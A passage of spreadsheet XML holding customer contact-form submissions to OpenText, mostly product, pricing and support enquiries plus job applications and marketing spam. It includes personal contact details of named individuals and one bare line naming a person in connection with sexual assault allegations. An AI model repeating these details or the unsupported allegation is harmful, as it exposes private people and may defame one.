Enquiries with the Do Not Call Register have identified you as the culprit of unsolicited faxes to the above number. _x000D_
There is no fax machine at this number. This business number is diverted to a mobile and your faxes constitute harassment. _x000D_
Cease and desist otherwise I will be forced to look into legal proceedings. </t>
  </si>
  <si>
    <t xml:space="preserve">I would like to know about pricing for the Captiva system.  Dye &amp; Durham processes between 250,000 and 500,000 pages of paper and pdf documents per year.  We would like to understand the cost of doing data collection from those documents using Captiva. </t>
  </si>
  <si>
    <t>We would like to receive more information and schedule a demo for a few individuals at our Amherst, OH location specifically to discuss your invoice scanning (OCR) and document workflow solutions.  Nordson has just started a process standardization project that includes our North American finance groups.  The focus of this discussion would be automation for our Accounts Payable function.  Our goal is to have a basic automated solution in place by the end of the year.  The tentative solution we would like to look at would include these steps: _x000D_
1. Transferring invoices collected in various formats from our existing supplier webportal into your software to be processed/OCR scanned _x000D_
2. Your software would route invoices for GL assignment and/or dollar value approval _x000D_
3. Once workflow routing is complete, your software would transmit the invoice data into our SAP ERP system.  _x000D_
_x000D_
Looking through some of the information on your website, it mentions SAP with HANA but just as an FYI, Nordson's SAP system is on-premise and does not currently have any HANA functionality enabled to my knowledge.</t>
  </si>
  <si>
    <t>_x000D_
 _x000D_
KOOPERATIONSVORSCHLAG- _x000D_
_x000D_
Herr _x000D_
BOJAN DEJAK,Univ.Dipl.Oekonom, Diplomkaufmann, (VII. Stufe); _x000D_
_x000D_
SLOWENIEN, _x000D_
Europa, EU (Im EU-EG schon ab 1.Mai 2004). _x000D_
Von 1.1.2007 im Slowenien nur noch Euro-Geldwert (Euroland). _x000D_
. Ab 21.12.2007 Slowenien schon in Schengen-Gebiet. _x000D_
. Ab 01.01.2008 führt Slowenien EU-Präsidium. _x000D_
Kostenlose Telefonnummer: + 386 40 291-911 _x000D_
E-Post: bojan.dejak@gmail.com _x000D_
xing profile:bojan dejak _x000D_
_x000D_
_x000D_
BETREFF: BEWERBUNGSSCHREIBEN _x000D_
_x000D_
Ich wurde am 25.Mai 1970 in Ljubljana/Slowenien geboren, bin diplomierter _x000D_
Oekonom - Diplomkaufmann (VII. Stufe, Richtung Verkauf und Marketing). _x000D_
Mein Studium habe ich im Jahr 1995 abgeschlossen. _x000D_
Fremdsprachkenntnisse: -Deutsch-aktiv (war 2 Jahren im Deutschland, _x000D_
Stuttgart,Mercedes-Benz AG Stuttgart); _x000D_
-----------------------Deutsch und Englisch-aktiv, _x000D_
-----------------------Kroatisch, Mazedonisch, Albanisch und Serbisch-aktiv, _x000D_
-----------------------Italienisch-aktiv. _x000D_
-----------------------Ungarisch-aktiv, _x000D_
-----------------------rusisch, tschechisch, slowakisch und polnisch-pasiv. _x000D_
_x000D_
Mein Praktikum habe ich in einer privaten Handelsfirma in Ljubljana _x000D_
gemacht. _x000D_
In der Zeit von 1997-2015 war ich Geschäftsführer im privaten _x000D_
Handelsfirma, der Firma CE A.G. in Slowenien und war dort fuer alles _x000D_
verantwortlich. _x000D_
Wir haben sehr viele verschiedene Produkte für den Großhandel aber auch für _x000D_
einige Einzelhandelsbetriebe verkauft. Ich bin gut Kenner des _x000D_
Slowenisches Marktes und auch der Märkte Ex-Yugoslawiens sowie auch _x000D_
Italien. _x000D_
_x000D_
Es ist mein großer Wunsch, eine Kooperation _x000D_
(HV, Job, Jointventure, Partnerschaft, oder nur Projekt zu beginnen) zu starten. _x000D_
Ich möchte mich auch weiterbilden. _x000D_
Noch ein paar Angaben: Wehrdienst habe ich in Ex-Jugoslawien geleistet, _x000D_
beherrsche Computerprogramme wie Windows, Excel, Word, Outlook, Internet _x000D_
sowie Maschinenschreiben. In Slowenien und auch im Kroatien _x000D_
(Dubrovnik) habe ich jeweils ein eigenes Haus, _x000D_
bin verheiratet, habe eine Tochter. _x000D_</t>
  </si>
  <si>
    <t>Verify the status of our ApplicationXtender partner relationship with OpenText, now that you own AppXtender. Additionally, we need to continue to pursue a solution to a significant issue we have with the product.</t>
  </si>
  <si>
    <t>Hi, _x000D_
_x000D_
I hope you are the right person to discuss about the Database of SAP software users._x000D_
_x000D_
We have the complete contact details of CIO/COO/CSO/CTO, Key decision makers of Business Intelligence management, Business Process management, Data management &amp; Administration, IT management/Architecture/Design, System administration and security, Web and application development management and all manner of people, across the world, who might be interested in your products and services._x000D_
_x000D_
It is a massive SAP users database, covering every major technical SAP module in the world, including : _x000D_
_x000D_
1.) SAP ABAP module_x000D_
2.) SAP BI module_x000D_
3.) SAP BPC module_x000D_
4.) SAP BODI module_x000D_
5.) SAP EP module_x000D_
6.) SAP GRC module_x000D_
7.) SAP MDM module_x000D_
8.) SAP Net weaver module_x000D_
_x000D_
Please fill your target Industry with following details so that I can send you counts, cost and few free samples for your reference:_x000D_
_x000D_
Target Industry :_x000D_
Target Geography :_x000D_
Target Job Title :_x000D_
_x000D_
Look Forward to your response._x000D_
_x000D_
Best Regards,_x000D_
Alice Miller_x000D_
Marketing Manager</t>
  </si>
  <si>
    <t>Credentials needed to raise a support query for ViewStar.</t>
  </si>
  <si>
    <t xml:space="preserve">Our client, PG&amp;E, is moving to a BYOD policy and they’d like to know if Documentum's Record Management System is compatible with Citrix environment use, and whether it can be installed on a multi-user server environment.  They’d also like to know if the key is multiple-user, unique, or concurrent.  Thanks!_x000D_
</t>
  </si>
  <si>
    <t>Interest in Application Xtender</t>
  </si>
  <si>
    <t>Testing from DAM page</t>
  </si>
  <si>
    <t>BPM</t>
  </si>
  <si>
    <t>Hello. My organization is investigating solutions for a Digital Asset Management system and would like to send an RFP to OpenText for evaluation. Can I please have the appropriate contact information for such a request? Thank you, Kyle</t>
  </si>
  <si>
    <t>We need to better secure a Java Web application using BERT reports.  We currently have about 60 Users.  What would be the  cost to use iHub?</t>
  </si>
  <si>
    <t>OCR</t>
  </si>
  <si>
    <t>Hi,_x000D_
 _x000D_
I hope you are the right person to talk about new companies interested in having business relationships with you._x000D_
 _x000D_
If yes, then let me know the specific industry you are interested in and we will send you a sample file of companies and their contacts with complete contact information such as Business email, Phone number, Names and Mailing address etc. of each executive._x000D_
 _x000D_
These companies and contacts index can be used for your multi marketing initiatives as well as new customer acquisition efforts your sales teams engage in._x000D_
 _x000D_
Further, we can validate and clean any of the marketing databases you may currently have in-house, and append additional contacts or company information that can both save you valuable time and increase your sales._x000D_
 _x000D_
I look forward to your reply.  _x000D_
 _x000D_
Regards,_x000D_
David Smith _x000D_
Marketing Manager</t>
  </si>
  <si>
    <t>we have an old captaris RightFax 9.4 server that we need to export or archive old faxes from.  Need support on how to accomplish this.</t>
  </si>
  <si>
    <t>I want to learn more about the product.  We deal with a great deal of unstructured data related to our client deliverables and I'd like to find ways that we can farm that data in a way that benefits our customers.</t>
  </si>
  <si>
    <t>Dear Sir/Madam,_x000D_
 _x000D_
My name is Felipe Rubio. I represent a number of institutions in Latin America that will begin the digitization process within the next year or two, and we have started a search process for companies that may be able to take on these tasks._x000D_
 _x000D_
A project to digitize the entire judicial system of one of these countries is a project with a starting date within the next 6-12 months._x000D_
 _x000D_
We are looking to digitize from simple things as creating a portal to the complexities of web security, and linking different government agencies._x000D_
 _x000D_
I would appreciate any information that you could provide us if this is a feasible project for you company._x000D_
_x000D_
I will be in Toronto until March 27 if you would like to have a chat on what were looking for. My number is 647-907-3361 _x000D_
_x000D_
Otherwise, we could always connect via email  or other means._x000D_
 _x000D_
Yours truly,_x000D_
 _x000D_
Felipe Rubio</t>
  </si>
  <si>
    <t>_x000D_
Conference series LLC cordially invites all participants across the globe to attend the 4th  International Conference on Big Data Analysis and Data Mining (Data Mining 2017) which is going to be held during September 07-08 in Paris, France to share the Future Technologies for Knowledge Discoveries in Data" and technology._x000D_
For more details visit:http://datamining.conferenceseries.com/</t>
  </si>
  <si>
    <t>I just downloaded Free DWG Viewer but it say the license will expire on 02.05.2017. Is this software free or is the title misleading._x000D_
What will happen after this date?_x000D_
Kind Regards_x000D_
Tomasz</t>
  </si>
  <si>
    <t>We would like to Buy Acutuate 3.1.1.1 License. Its been two weeks we are trying to get price for the same. I need urgent help on the matter.</t>
  </si>
  <si>
    <t>Dear Opentext Sales Representative,_x000D_
_x000D_
I'm the new printing business unit manager of Aloha Informatika (Hungary)._x000D_
I'm looking for long term and strategic cooperation with one of the suppliers of cost management softwares in the market for future business we are developing. Do you have presence in Hungary and sales who I could sit down to negotiate terms of such a cooperation?_x000D_
Thank you in advance, I wait your feedback._x000D_
_x000D_
Have a nice day,_x000D_
Zoltan</t>
  </si>
  <si>
    <t>Estimado/a representante de Open Text:_x000D_
 _x000D_
Tengo el título de Grado en Ingeniería de Telecomunicaciones en Sonido e Imagen por la Universidad Politécnica de Madrid, y me gustaría solicitar una plaza en su empresa._x000D_
_x000D_
Finalicé las asignaturas del grado en los 4 años que le corresponden mientras lo compaginaba con diferentes trabajos y prácticas. El quinto año lo dediqué a la realización del proyecto de fin de grado y prácticas en la empresa Indra Sistemas como Tester en el área de ATM._x000D_
_x000D_
Durante mis estudios he aprendido redes, programación, transmisión de vídeo e imagen y sonido, entre otros. En las prácticas en investigación y la realización del proyecto de fin de grado mejoré mis conocimientos sobre procesado de imagen y vídeo y su transmisión. Gracias al trabajo en Indra Sistemas he mejorado mi perfil profesional, y considero relevante mi rápido aprendizaje y toma de responsabilidades, adaptándome a diferentes situaciones complejas (relevando a mi anterior responsable en el momento más critico del proyecto) y trabajando tanto individualmente como en equipo._x000D_
 _x000D_
Estoy muy interesada en desarrollar mis competencias en varias de sus áreas de trabajo, principalmente en el área de Media and Entertainment, pero también en arquitecturas de red y la parte de Cloud._x000D_
_x000D_
Por otro lado, tengo un nivel de inglés alto tanto hablado como escrito. Obtuve el First Certificate in English y estoy en continúo aprendizaje. Además he estado trabajando en Oslo, donde he perfeccionado mi inglés técnico y profesional, ya que trataba directamente con el cliente._x000D_
 _x000D_
Estoy muy interesada en concertar una entrevista con ustedes con el fin de incorporarme a su equipo en cualquiera de sus localizaciones. Para ello adjunto una copia de mi Currículum Vitae._x000D_
 _x000D_
Si lo consideran oportuno, pueden ponerse en contacto conmigo por correo electrónico o vía telefónica._x000D_
 _x000D_
Espero su respuesta._x000D_
Atentamente,_x000D_
 _x000D_
                            Sara González Martín</t>
  </si>
  <si>
    <t>I require access to the Kainos Evolve account, my colleagues Mark Magill and Patricia McCullagh currently have the access to the Product set.</t>
  </si>
  <si>
    <t>We have a FirstClass mailserver, but need local techinical support for this product. The old vendor supporting it, dosn't do in this product anymore</t>
  </si>
  <si>
    <t xml:space="preserve">Greetings,_x000D_
_x000D_
We are looking for a correspondence management solution that has an Outlook add in so that correspondences can be issued from email directly._x000D_
_x000D_
I believe OpenText Correspondence Solution has such functionalities , but we would like more information about it if possible._x000D_
_x000D_
If you can provide us with the functional capabilities of the solution you provide in general, and the outlook add in you provide then it would be much appreciated._x000D_
_x000D_
Thank you._x000D_
_x000D_
Regards,_x000D_
Abdullah Muhainy_x000D_
</t>
  </si>
  <si>
    <t>Getting a quotation for a customized training on SrtreamServe 5.6</t>
  </si>
  <si>
    <t>Hi,_x000D_
Need SEO for your Website? We _x000D_
_x000D_
can help you with our SEO _x000D_
_x000D_
program in only $99 Per month _x000D_
_x000D_
per website._x000D_
_x000D_
Looking forward for your _x000D_
_x000D_
positive response  _x000D_
_x000D_
Best_x000D_
Lizzy_x000D_
Skype:ranksindia</t>
  </si>
  <si>
    <t>We are looking for Documentum EDMS for our upcoming project in Malaysia. Please help by channeling your representative/agent in this region. _x000D_
Appreciate your prompt response.</t>
  </si>
  <si>
    <t xml:space="preserve">Good day,_x000D_
_x000D_
We will receive a request from our customer to purchase the product – RightFax._x000D_
Is it possible to purchase this product in your company for further resale?_x000D_
We are interested in prices and the availability of VAT._x000D_
And also kindly ask you what discount will you give us to purchase this product? What is the delivery time and conditions for the purchase?_x000D_
Please answer as soon as possible._x000D_
Thanks in advance._x000D_
_x000D_
_x000D_
Best regards,_x000D_
Maria Kobzeva_x000D_
Southern Software Company_x000D_
</t>
  </si>
  <si>
    <t>hi, i would like to ask, what's the difference between Livelink and Opentext ? I thouht that Livelink is the application and Opentext is the company right ?</t>
  </si>
  <si>
    <t xml:space="preserve">We had requested a Demonstration and to be able to ask some questions regarding the functionality and pricing, and we're still waiting for someone to contact us!_x000D_
</t>
  </si>
  <si>
    <t>Our Company EASS SDN BHD, located in Malaysia is one of the company that are bidding for MyIPO Tender Project. One of the requirement is use Documentum Management System. Appreciate it, if you could link me to the right person from your organisation to satisfy our tender requirement.</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking for an out-of-box solution that allow user (internal / external) to scan/drag &amp; drop images onto a Web UI (with preview) then perform the necessary classification of the documents either by extracting key information from barcode / ocr / manual entry of metadata and grouping of images/document into a document type. Then these documents can be retrieved for display / printing. Finally, the images/documents can be saved on a file with pre-defined naming convention for long term archival._x000D_
_x000D_
If you have some solution that fit this, wish to hear from you soon. Also if you have a trial software that we could evaluate will be great._x000D_
</t>
  </si>
  <si>
    <t>Searching for Documentum Management System Consultant in Malaysia</t>
  </si>
  <si>
    <t>Costo para una licencia. gracias</t>
  </si>
  <si>
    <t>Evaluating Extended ECm for Salesforce.com for one of Client's need</t>
  </si>
  <si>
    <t>Hi ,_x000D_
_x000D_
I'm Monsur Biplob.I'm professional B2B Lead Generator and Email Marketer.So if you need to service as like Lead Generation, Email Marketing, SEO, Data Mining and so on.please let me know._x000D_
_x000D_
As a full-time freelancer.Lead generation has been my core area of expertise and interest for over the last four years. I have built myself as a lead generating ninja through hard labor and quick learning ability. I'm available on 24 hours a day,7 days a week.In the lead generation projects, my services are included - _x000D_
_x000D_
=✔ Contact Discovery _x000D_
=✔ Big Data_x000D_
=✔ Data Science _x000D_
=✔ Account Profiling_x000D_
=✔ Database Building _x000D_
=✔ Email Sourcing_x000D_
=✔ Email Blasting_x000D_
=✔ Email Marketing_x000D_
=✔ Data Appending _x000D_
=✔ Contact List Building _x000D_
=✔ Data Acquisition_x000D_
=✔ Lead List Building_x000D_
=✔ Prospect List Building _x000D_
=✔ Email List Generation _x000D_
=✔ Data Mining _x000D_
=✔ B2B Sales Lead Generation_x000D_
=✔ Mailing List development_x000D_
=✔ Market Research _x000D_
=✔ LinkedIn Recruiting Sourcing_x000D_
=✔ LinkedIn Prospecting _x000D_
=✔ LinkedIn Researcher   _x000D_
=✔ Web Research_x000D_
=✔ LinkedIn Researcher _x000D_
=✔ Lead Generation Specialist _x000D_
=✔ Boolean String &amp; Boolean Search _x000D_
=✔ X-Ray Search_x000D_
=✔ CRM Database Experience: _x000D_
                                              =✔ Salesforce CRM_x000D_
                                              =✔ Zoho CRM _x000D_
                                              =✔ Pipedrive CRM_x000D_
_x000D_
_x000D_
Some of the companies I've worked with are Viralheat, Persado, Monetate, Relay Network, Inkling, Avalara, Pyxl, Brainscape, Honey.is, Aspire and so more............_x000D_
_x000D_
Tools  I used on a:_x000D_
_x000D_
=✔ LinkedIn Premium Account_x000D_
=✔ Data.com Premium Account_x000D_
=✔ ZoomInfo Premium Account_x000D_
=✔ Lead411 Premium Account_x000D_
=✔ Rapportive _x000D_
=✔ Mailtester_x000D_
=✔ Google Spreadsheet_x000D_
=✔ Boolean Search _x000D_
=✔ RocketReach_x000D_
=✔ Import.io_x000D_
=✔ Datanyze_x000D_
=✔ Salesloft_x000D_
_x000D_
My Skype id: monsur.biplob_x000D_
My Email Address: monsur.biplob25@gmail.com_x000D_
My Linkedin profile: https://www.linkedin.com/in/monsur-islam-bhuiyan-213239104/_x000D_
_x000D_
N.B: If you need large lead research I'm hap</t>
  </si>
  <si>
    <t>Need to change license server. What should I do?</t>
  </si>
  <si>
    <t>Dear Sales Team,_x000D_
_x000D_
We are looking for Exceed Classic open text support for our client at abu dhabi.  _x000D_
Kindly share the details and types of same._x000D_
Awaiting for your quick response._x000D_
_x000D_
Regards,_x000D_
Mohamed Kasim</t>
  </si>
  <si>
    <t>We are a SEO company https://www.seoworkdesk.com that provides reliable and affordable SEO services. You can use our SEO expertise to take control of your organized placement on all the major search engines and we have also highly 200 SEO experts. If you have realized how critical SEO is to your online success and boost your SERP rankings, then invite us today to bid on your project. Our SEO specialist will get you the best results. We will optimize your website for the most relevant and lucrative keywords that will bring in the terrific traffic you need. Our SEO strategies are based on: • Comprehensive keyword research • Website analysis • Competitor analysis • Internal Linking Structure • Title tag adjustments and we have also large amount of keywords around of seven billion._x000D_
SEOWORKDESK.COM team maps optimum SEO strategies by analyzing the slightly different algorithms of the search engines like Google, Yahoo, MSN, and Ask.com. Our team puts a great effort for researching the niche directories, websites, blogs, social networks and keywords to connect your website to such forums. This helps your website to go miles ahead from others and rank at the top on search engines, respectively. After in-depth research about your website and analyzing the targeted market for your business to prevail, we also execute effective online marketing campaigns by targeting not only local markets but as well as provincial and international markets as well. So you will be getting all-in-one services when contacting us. In this report, you will be able to see your existing listings in all the major search engines. This brief and concise report will be sent on monthly basis to help you to document your website progress. Our analysis report will show you that how your website is suffering from major search engines compatibility issues and the reasons why is it not ranking high on the target search engine queries. Each month we will be sending you a ranking report based on the progress o</t>
  </si>
  <si>
    <t>I need a personal loan of 500 to get a place for me and my family to live</t>
  </si>
  <si>
    <t>sexual assault allegations against Adel Ahmed in Stockholm.</t>
  </si>
  <si>
    <t>I have downloaded FirstClass Go for mobile phone but can not get into the calendar. Can you tell me how to fix this? Thanks, Laura</t>
  </si>
  <si>
    <t>Hi,_x000D_
 _x000D_
We are a small firm (~20 employees) looking to implement a DMS this year.  Most software we have looked at (including iManage) does not have an integration with Outlook for Mac yet, which is very important to us in our paperless environment._x000D_
 _x000D_
Could you please let us know if Worldox is a potential solution for our firm?_x000D_
 _x000D_
Thank you,</t>
  </si>
  <si>
    <t xml:space="preserve">The email below was sent on 29 November 2016. I have received no reply. You still have my money and I still can't use the program I paid for. Please rectify this  situation._x000D_
_x000D_
David Barrington_x000D_
_x000D_
Hi,_x000D_
_x000D_
A few days ago I bought a Brava Desktop licence. See snip from my bank statement below. I have heard nothing from you, such as a download link or password. I downloaded via the evaluation page because I couldn't see another way to proceed. You have my money. What is going on?_x000D_
_x000D_
David Barrington_x000D_
_x000D_
_x000D_
On 19/11/2016 12:42 PM, OpenText wrote:_x000D_
&gt;  _x000D_
&gt;_x000D_
&gt; If your email program has trouble displaying this email, view it as a web page_x000D_
&gt;  _x000D_
&gt;_x000D_
&gt;_x000D_
&gt; 	_x000D_
&gt; 	_x000D_
&gt;_x000D_
&gt; 	_x000D_
&gt; Dear David,_x000D_
&gt;_x000D_
&gt; You have just 7 days left in your evaluation period. Visit the web store today to make sure you can keep using Brava! Desktop after the trial period is over._x000D_
&gt;  _x000D_
&gt; Need to merge or batch-print documents?_x000D_
&gt;_x000D_
&gt; Add Brava! Batch to easily create new documents by merging all or part of multiple source documents. Source documents can be Microsoft Word, PDF, images, and even CAD drawings. Available on the web store._x000D_
&gt;_x000D_
&gt; Want more information? Contact us at: kvarley@opentext.com or 800-398-7005._x000D_
&gt;_x000D_
&gt; 	_x000D_
&gt;_x000D_
&gt; 	_x000D_
&gt; 	_x000D_
&gt;_x000D_
&gt;  _x000D_
&gt;_x000D_
&gt; This email was sent to: davebarrington@bigpond.com_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; We respect your right to privacy_x000D_
&gt; View Our Policy | Unsubscribe | Update Profile_x000D_
&gt;_x000D_
&gt; www.opentext.com_x000D_
&gt;_x000D_
&gt; Open Text Headquarters: 275 Frank Tompa Dr., Waterloo, Ontario, Canada N2L 0A1_x000D_
&gt;_x000D_
&gt; This email is protected by copyright laws and is the property of Open Text Corporation.  It may contain confidential and/or proprietary information of Open Text Corporation and/or its subsidiaries (OTC), and may be legally privileged. This email  may only be lawfully received, accessed, displayed, and/or used by the specific addressee(s) named above ("Authorized Recipient") for the purpose for which it was sent by OTC. If you are not an Authorized Recipient, you must immediately delete this email in its entirety._x000D_
&gt;_x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
I need to raise a fault to diagnose an issue with the routed to field as AD is not providing the routing field. When I restart our fax gateway then the routed to field populates and clients receive their fax via email._x000D_
_x000D_
I'm raising a fault so this may be investigated further for Monday morning ( 20th March 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">We need to upgrade our RightFax and move it off a 2003 server. I just need information. </t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
We are an IT re seller company based out of El Segundo, CA and I would like to introduce myself as the Vendor Manager for Open Text at PCM. I will be handling your account and your main point of contact._x000D_
I would like to confirm who would be the channel account manager at Open Text for So Cal region so we can update our records and keep you guys posted on our future sales/ marketing opportunities._x000D_
_x000D_
Regards,_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Do you have QFINITI training plans?</t>
  </si>
  <si>
    <t>We are interested in an ECM solution that works with SharePoint online, Office 365.</t>
  </si>
  <si>
    <t>Need pricing on Gupta Report Builder</t>
  </si>
  <si>
    <t>Like to evaluate OpenText BPM solution for CIT Group.</t>
  </si>
  <si>
    <t>quote needed please - Can you please provide me with a quote for 35 OpenText eDocs DM licenses for Blackrock?</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
My name's Benjamin Brown and I'm a business student at the university of Ottawa._x000D_
I'm reaching out today on behalf of AIESEC Ottawa.AIESEC is currently the world's largest student-run non-profit organization and our mission is to develop young leaders in reaching their full potential through our global volunteer and professional internship programs._x000D_
_x000D_
That being said, I was wondering if you would be able to arrange a time to chat next week in order to get to know Opentext a little better and see if a potential partnership with AIESEC can bring fruitful results for Opentext in both the short and long term._x000D_
_x000D_
Thank you for your time and we hope to work with you soon!_x000D_
_x000D_
Regards,_x000D_
_x000D_
Benjamin Brown_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">The MITRE Corporation was contracted by the FDA OFVM in leading an effort to identify a performance management technology. Key functional capabilities include configurable work flow/processes/business rules/forms, data import, dashboard, and reporting. We are currently in the process of identifying, evaluating, and inviting providers to demonstrate their solutions. We are interested in understanding your company’s offerings (products, services and solutions) in this domain. We would like to send you a questionnaire to better help us evaluate your product against OFVM’s needs. </t>
  </si>
  <si>
    <t>Que partner existen en chile para la distribución de la herramienta OpenText?</t>
  </si>
  <si>
    <t>seeking to discuss feature and pricing info, and is nonprofit pricing available?</t>
  </si>
  <si>
    <t xml:space="preserve">Good Morning, _x000D_
_x000D_
I just wanted to let you know that we’ve implemented a new invoicing system that employs an automated capture service._x000D_
_x000D_
Could you ensure that invoices going forward are directed to either of the following addresses (either email or mail)?  The email is the preferred method and ensures faster processing._x000D_
_x000D_
Vendors may submit invoices to the Invoice Capture processing center in two ways:_x000D_
_x000D_
Email:	amalgamatedInvoiceCapture@concursolutions.com_x000D_
_x000D_
Mail:	Amalgamated Bank C/O Concur Invoice Capture _x000D_
10700 Prairie Lakes Drive_x000D_
Eden Prairie, MN 55344_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I am Lily Zhao from Voice Engineer department @ IDT telecom. We are retail and wholesale telephony company headquarter in Newark, NJ._x000D_
_x000D_
We try to reach you to require some information regarding opentext fax product as well as explore the possibility to integrate opentext product into our platform to provide efax service for our customer.  We have own our fax server  and  would like to provide efax service so our enterprise/retail  customer is able to receive and send fax through email etc. _x000D_
_x000D_
Let me know if you are available to talk about this with us.  looking forward to your replay _x000D_
_x000D_
Regards</t>
  </si>
  <si>
    <t>Looking to speak with someone on the possibility of utilizing Right Fax as an incoming fax solution. We have users that get their faxes delivered to their Outlook mailboxes currently with another application we are looking to replace. These users gets faxes in their mailboxes, and are able to send faxes from Outlook. Please contact me to discuss.</t>
  </si>
  <si>
    <t xml:space="preserve">VIM - need to upgrade from versions 5.2 and 6.0 to 4.0 or 7.5.  This is for Univar US. Univar has 7.0 support notes from 2012 to Dec 2013, but needs the remainder of notes for version 7.0 and needs to discuss re-licensing if version 7.5 were implemented, as many of those upgrades notes are not available.    </t>
  </si>
  <si>
    <t>I would like to get ahold of our salesmen about the cost to add licenses to our contract.   According to our Invoice that should be Ana Costa?</t>
  </si>
  <si>
    <t>We need the KC usename and the password to download the software. Nobody received an additional e mail with this information</t>
  </si>
  <si>
    <t xml:space="preserve">hello dear_x000D_
thank for time amen_x000D_
i m interset digital at time _x000D_
nice business amen_x000D_
thank you_x000D_
raoulteam1_x000D_
</t>
  </si>
  <si>
    <t>TO discuss your latest release and the BPM capabilities it contains.  Looking at options for the development of workload management systems for the US Navy.</t>
  </si>
  <si>
    <t>We are looking for a client solution and we want to evaluate the documentum product.</t>
  </si>
  <si>
    <t>I have completed Mtech(cs) in 2015..am a fresher..have knowledge of manual and automation testing..any opening for freshers in testing profile..please let me know.._x000D_
_x000D_
_x000D_
Thanks _x000D_
Nidhi</t>
  </si>
  <si>
    <t>One of our client required a customer communication management, need urgent assistant to see the possibility of working together on this lead</t>
  </si>
  <si>
    <t>I would like to evaluate the Content Server for a customer implementation project. How can I download &amp; install it ?</t>
  </si>
  <si>
    <t>Hello,_x000D_
we are working on a project for a big client from the financial sector where we assess the database system they use today in terms of its future potential, vendor stability, roadmap and upgrades in the horizon of next 5 years. The result of this assessment will be a recommendation whether to continue in using the current DB system or to change it for the competition DB system. For this reason, we also assess all these aspects regarding the Gupta Team Deverloper they use today for the application support of their DB. That is why we need the information about the perspective of Gupta TD, its roadmap, if there will be sufficient support in next 5 years, relevant references, ranking compared to other platforms and the availability of Gupta TD professionals in Slovakia (or Czech Republic). Could you please help us with these information?_x000D_
_x000D_
Thank you very much!_x000D_
_x000D_
Best regards,_x000D_
_x000D_
Jan Giba</t>
  </si>
  <si>
    <t>Hi,_x000D_
We would be interested in your tool "eDOCS for Microsoft SharePoint", as we have eDocs in use here and would like to be able to present the eDocs Content to our users._x000D_
_x000D_
We are planning to Rollout 0365 within the Year and would like to know if "eDOCS for Microsoft SharePoint" can be used on 0365 SharePoint Platform and which option there would be for us to get a Trial-Version of this tool._x000D_
_x000D_
Could you please provide us details how to get more insight on this Tool and how to register for a Trial version?_x000D_
_x000D_
Best regards,_x000D_
Erol Ulupinar</t>
  </si>
  <si>
    <t>Purchase RightFax software and service</t>
  </si>
  <si>
    <t>Interested in contract opportunities with TeamSite</t>
  </si>
  <si>
    <t>A client of mine is looking for a web browser plugin with the ability to view. _x000D_
One of the unique requirements is the ability to "split" pages._x000D_
Would BRAVA offer the capabilities?</t>
  </si>
  <si>
    <t>Right Fax Quotation</t>
  </si>
  <si>
    <t>Need to be able to access Knowledge Base documents</t>
  </si>
  <si>
    <t>We need to implement an ECM in the next 6 months.  Do you have sales office in Philippines?</t>
  </si>
  <si>
    <t>investigating the possibility of integration between the Sharepoint application that using in calgary and a new  business process management (BPM)</t>
  </si>
  <si>
    <t>Product road maps for each version; we are licensed for Redact-It, Content Suite, Infofusion, TempoBox._x000D_
I need to know what versions are supported with EoL dates and anticipated release dates for new versions</t>
  </si>
  <si>
    <t>Exploring the sourcing of our image processing system</t>
  </si>
  <si>
    <t>Dear opentext team,_x000D_
_x000D_
This is Hady Wehbe, I am a business consutant and I represent an Iraqi bank looking for a document management solution._x000D_
_x000D_
Can you please share with me the following:_x000D_
1- Price for an on-premises installation of the DMS. The bank has around 20 branches with 3 users that need to access the application per branch._x000D_
2- The application is a web application? accessible using a browser, right?_x000D_
3- The DMS is available in Arabic language. We need to have English and Arabic languages._x000D_
4- Do you have any legal constraints for selling the DMS licenses in Iraq? do you have local implementers or partners?_x000D_
5- We need references in the banking sector: banks that have used the DMS application in the MENA region._x000D_
6- The DMS features are described in the website, but I will need a detailed features document to better promote the product._x000D_
7- What about the maintenance? how do you charge it?_x000D_
8- What about the product customization in case the client requested a specific feature that is not available in the product, what do you do in such case?_x000D_
_x000D_
Thank you._x000D_
Hady</t>
  </si>
  <si>
    <t>Hi,_x000D_
 _x000D_
Hope you doing well. _x000D_
 _x000D_
Would you be interested to reach all the Information Technology users across the Globe? We specialize in providing the customized leads exactly based on your target criteria from any industry._x000D_
_x000D_
Based on your company profile, we have developed an extensive database of following technologies users with opt-in emails, telephone numbers and other details._x000D_
 _x000D_
• Microsoft Dynamics CRM Users_x000D_
• Microsoft Dynamics GP Users_x000D_
• Microsoft Dynamics SL Users_x000D_
• Microsoft Dynamics Sharepoint Users_x000D_
• Microsoft Dynamics AX Users_x000D_
• SAP Users_x000D_
• Sage Users_x000D_
• All ERP &amp; CRM Users_x000D_
• Accounting Software. Etc._x000D_
 _x000D_
Job Level - C-Level/VP/Director/Manager and others as per criteria._x000D_
_x000D_
 Let me know your criteria for more info and pricing associated with it._x000D_
 _x000D_
Look forward to hear from you soon._x000D_
_x000D_
Regards,_x000D_
Sharine Harris_x000D_
Marketing Manager</t>
  </si>
  <si>
    <t>Interested in information regarding what previously was referred to as Hummingbird.</t>
  </si>
  <si>
    <t>We’re looking for a product that can manage retention policies of our electronic records currently stored in various repositories (shared network folders, Laserfische, and potentially SharePoint).  Please contact me for a product demonstration.  Thanks.</t>
  </si>
  <si>
    <t>Looking for pricing for Professional/Enterprise Remote Control Access Software for around 200 remote access points.</t>
  </si>
  <si>
    <t>Trying to generate license keys for a customer. Need access to perform this action. Customer Software PIN: IGC405962.  OpenText Contact: Dave Hinkle, Solutions Consultant 480.436.9160 (Mobile), 480.223.5092 (Office). We are a partner and system integrator. Please help.  Thanks, -Kirt</t>
  </si>
  <si>
    <t>I am evaluating different products for a client and I am trying to understand the various options available from open text and how they map to my client's needs. I would love to talk to a sales person and get some help to better understand your offerings._x000D_
_x000D_
Thanks_x000D_
Kandis</t>
  </si>
  <si>
    <t>We need to reinstall our software on new machines and need the download links. thanks</t>
  </si>
  <si>
    <t xml:space="preserve">need a RightFax Server express solution in a virtual environment_x000D_
</t>
  </si>
  <si>
    <t>Hello, I am looking for your Clinical Archiving solution, described here:  http://documentum.opentext.com/industries/healthcare/ _x000D_
_x000D_
